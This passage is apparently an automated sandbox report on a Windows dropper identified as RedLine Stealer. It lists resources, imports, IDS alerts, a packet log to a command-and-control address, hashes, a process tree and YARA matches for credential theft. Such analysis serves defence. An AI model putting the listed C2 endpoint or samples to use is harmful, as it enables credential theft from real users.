                                                                                                                                                                                                        RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                                                                                                                                                        RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                                                                                                                                                        RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                                        RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                                                                                                                                                        RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                                                                                                                                                        RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                                                                                                                                                        RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                                                                                                                                                        RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                                                                                                                                                                        RT_DIALOG0x24a340x35cdataRussianRussia
                                                                                                                                                                                                        RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                                                                                                                                                                        RT_DIALOG0x24f400x1b4dataRussianRussia
                                                                                                                                                                                                        RT_DIALOG0x250f40x166dataEnglishUnited States
                                                                                                                                                                                                        RT_DIALOG0x2525c0x168dataRussianRussia
                                                                                                                                                                                                        RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                                                                                                                                                        RT_DIALOG0x255840x1e0dataRussianRussia
                                                                                                                                                                                                        RT_DIALOG0x257640x130dataEnglishUnited States
                                                                                                                                                                                                        RT_DIALOG0x258940x150dataRussianRussia
                                                                                                                                                                                                        RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                                                                                                                                                        RT_DIALOG0x25b040x122dataRussianRussia
                                                                                                                                                                                                        RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                                                                                                                                                        RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                                                                                                                                                        RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                                                                                                                                                        RT_STRING0x2625c0x52edataRussianRussia
                                                                                                                                                                                                        RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                                                                                                                                                        RT_STRING0x26d580x592dataRussianRussia
                                                                                                                                                                                                        RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                                                                                                                                                        RT_STRING0x2779c0x4b2dataRussianRussia
                                                                                                                                                                                                        RT_STRING0x27c500x44adataEnglishUnited States
                                                                                                                                                                                                        RT_STRING0x2809c0x43edataRussianRussia
                                                                                                                                                                                                        RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                                                                                                                                                        RT_STRING0x288ac0x2fcdataRussianRussia
                                                                                                                                                                                                        RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x28bb00x47cc2Microsoft Cabinet archive data, many, 294082 bytes, 2 files, at 0x2c +A "twl97yF91.exe" +A "uPD30tM82.exe", ID 2151, number 1, 18 datablocks, 0x1503 compressionEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708740x4dataEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708780x24dataEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x7089c0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708a40x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708ac0x4dataEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708b00xedataEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708c00x4dataEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708c40xedataEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708d40x4dataEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708d80x6dataEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708e00x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                        RT_RCDATA0x708e80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                        RT_GROUP_ICON0x708f00xbcdataEnglishUnited States
                                                                                                                                                                                                        RT_VERSION0x709ac0x408dataEnglishUnited States
                                                                                                                                                                                                        RT_VERSION0x70db40x410dataRussianRussia
                                                                                                                                                                                                        RT_MANIFEST0x711c40x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                        ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                        KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                                                                                                                                                        GDI32.dllGetDeviceCaps
                                                                                                                                                                                                        USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                                                                                                                                                        msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                                                                                                                                                        COMCTL32.dll
                                                                                                                                                                                                        Cabinet.dll
                                                                                                                                                                                                        VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                        RussianRussia
                                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        192.168.2.3193.233.20.234973641232043233 02/27/23-09:31:19.481059TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        192.168.2.3193.233.20.234973641232043231 02/27/23-09:31:37.882033TCP2043231ET TROJAN Redline Stealer TCP CnC Activity497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        192.168.2.3193.233.20.234969941232043233 02/27/23-09:30:29.261461TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        193.233.20.23192.168.2.34123497362043234 02/27/23-09:31:21.995610TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        192.168.2.3193.233.20.234969941232043231 02/27/23-09:30:46.338879TCP2043231ET TROJAN Redline Stealer TCP CnC Activity496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        193.233.20.23192.168.2.34123496992043234 02/27/23-09:30:34.424527TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Feb 27, 2023 09:30:28.799913883 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:28.822324038 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:28.822432995 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:29.261461020 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:29.284508944 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:29.332160950 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:34.401050091 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:34.424526930 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:34.582655907 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:41.856347084 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:41.881480932 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:41.881546974 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:41.881582022 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:41.881694078 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:41.989501953 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.182545900 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.205604076 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.224679947 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.248169899 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.263103008 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.286006927 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.328735113 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.387837887 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.412041903 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.419509888 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.443514109 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.445651054 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.470002890 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.534809113 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.557168007 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.557209015 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.557670116 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.692811966 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.885574102 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.908159018 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.911379099 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.934298038 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.938992977 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:43.961504936 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:44.083498955 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:44.430603027 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:44.453414917 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:44.622065067 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:44.644484043 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:44.646148920 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:44.692872047 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:44.757424116 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:44.779812098 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:44.780401945 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:44.868472099 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:45.822874069 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:45.845217943 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:45.845873117 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:45.858052015 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:45.880987883 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:46.083539009 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:46.169312954 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:46.192996979 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:46.315382957 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:46.338251114 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:46.338879108 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:30:46.361476898 CET412349699193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:30:46.398494005 CET496994123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:18.684068918 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:18.706500053 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:18.706656933 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:19.481059074 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:19.503772974 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:19.696652889 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:21.971812963 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:21.995609999 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:22.195980072 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:31.471957922 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:31.496052980 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:31.496093988 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:31.496124983 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:31.496254921 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:31.705389023 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:33.742319107 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:33.766498089 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:33.806375027 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:35.612361908 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:35.634870052 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:35.634954929 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:35.697151899 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:35.836565971 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:35.859450102 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.009665966 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.057981014 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.080349922 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.081332922 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.131738901 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.154635906 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.156091928 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.178980112 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.357662916 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.379848957 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.380387068 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.510029078 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.711627007 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.734822989 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.734865904 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.806591034 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.835944891 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.858872890 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.864465952 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.887478113 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.894176960 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:36.917124987 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.009783983 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.227041960 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.250790119 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.253142118 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.277036905 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.321152925 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.659293890 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.682101011 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.777072906 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.799846888 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.814235926 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.837686062 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.857275963 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.881268024 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.882033110 CET497364123192.168.2.3193.233.20.23
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.904980898 CET412349736193.233.20.23192.168.2.3
                                                                                                                                                                                                        Feb 27, 2023 09:31:37.931268930 CET497364123192.168.2.3193.233.20.23

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:09:30:15
                                                                                                                                                                                                        Start date:27/02/2023
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\W7ANVukbbj.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\W7ANVukbbj.exe
                                                                                                                                                                                                        Imagebase:0x860000
                                                                                                                                                                                                        File size:450560 bytes
                                                                                                                                                                                                        MD5 hash:093A149EA955420C85D54127E964879A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.254929355.0000000004A26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                        Start time:09:30:16
                                                                                                                                                                                                        Start date:27/02/2023
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:382976 bytes
                                                                                                                                                                                                        MD5 hash:8B79F6A1B67F97CA971CEF540ABF22E7
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: ditekSHen
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.322488235.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.333480133.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.333480133.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.257010194.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.322292427.0000000002E68000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        • Detection: 64%, ReversingLabs
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:09:30:24
                                                                                                                                                                                                        Start date:27/02/2023
                                                                                                                                                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        Imagebase:0x7ff759b10000
                                                                                                                                                                                                        File size:69632 bytes
                                                                                                                                                                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                        Start time:09:30:54
                                                                                                                                                                                                        Start date:27/02/2023
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe
                                                                                                                                                                                                        Imagebase:0x2b0000
                                                                                                                                                                                                        File size:179317 bytes
                                                                                                                                                                                                        MD5 hash:763CFA2A099AC8748401DF32FF369ACE
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000000.337013680.00000000002B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
